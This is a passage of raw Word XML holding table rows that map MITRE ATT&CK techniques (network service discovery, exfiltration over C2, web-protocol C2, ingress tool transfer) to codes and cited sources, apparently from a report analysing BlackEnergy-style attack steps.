          <w:p w14:paraId="7102FDB1" w14:textId="77777777" w:rsidR="00E42795" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ACB508F" w14:textId="0ADBBD29" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E32B30">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04DE4F1A" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[9] Noted in ATT&amp;CK </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>BlackEnergy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42795" w:rsidRPr="0062544E" w14:paraId="10104296" w14:textId="77777777" w:rsidTr="009672B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1693574D" w14:textId="1AEAAF74" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00FA713A" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D88E51D" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">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000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77CA4F97" w14:textId="17D01EE1" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Network Service Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="275C4DB1" w14:textId="445749EA" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00FA713A" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B1D4044" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C3736B0" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D39CA70" w14:textId="18F60BFF" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D1815FC" w14:textId="76A2A128" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[9] Noted in ATT&amp;CK </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>BlackEnergy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42795" w:rsidRPr="0062544E" w14:paraId="0D45EE0C" w14:textId="77777777" w:rsidTr="009672B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AD72665" w14:textId="653309B6" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00FA713A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AE8C97C" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">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0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F8656E4" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1041 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0062544E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FC02F2F" w14:textId="701CC78E" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00FA713A" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ADF0D6C" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A1298B7" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26796BF7" w14:textId="0CA2010D" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="00D77C34">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B2FA126" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="00DD4A99" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] System info exfiltrated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42795" w:rsidRPr="0062544E" w14:paraId="7909CC40" w14:textId="77777777" w:rsidTr="009672B0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ECA0186" w14:textId="47BD8287" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00FA713A" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36A9503D" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="187816D8" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Application Layer Protocol: Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52111869" w14:textId="6C6627C8" w:rsidR="00E42795" w:rsidRDefault="00FA713A" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74E259F8" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AA27987" w14:textId="77777777" w:rsidR="00E42795" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="361D0264" w14:textId="73C6D10D" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E32B30">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11F181B6" w14:textId="77777777" w:rsidR="00E42795" w:rsidRPr="0062544E" w:rsidRDefault="00E42795" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[9] Noted in ATT&amp;CK </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>BlackEnergy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947702" w:rsidRPr="0062544E" w14:paraId="2F8586F0" w14:textId="77777777" w:rsidTr="00947702">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76326852" w14:textId="1957ACA1" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00FA713A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06D9184A" w14:textId="77777777" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51858428" w14:textId="22CDBBAD" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947D5E" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A5536D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A2BD1FE" w14:textId="5AA6DDA0" w:rsidR="00947702" w:rsidRDefault="00FA713A" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E23C07C" w14:textId="77777777" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C9C2C43" w14:textId="77777777" w:rsidR="00947702" w:rsidRDefault="00947702" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00947702">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E5AF0AA" w14:textId="2D4EC88C" w:rsidR="00947702" w:rsidRPr="0062544E" w:rsidRDefault="00E32B30" w:rsidP="009672B0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E32B30">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4365" w:type="dxa"/>
          </w:tcPr>
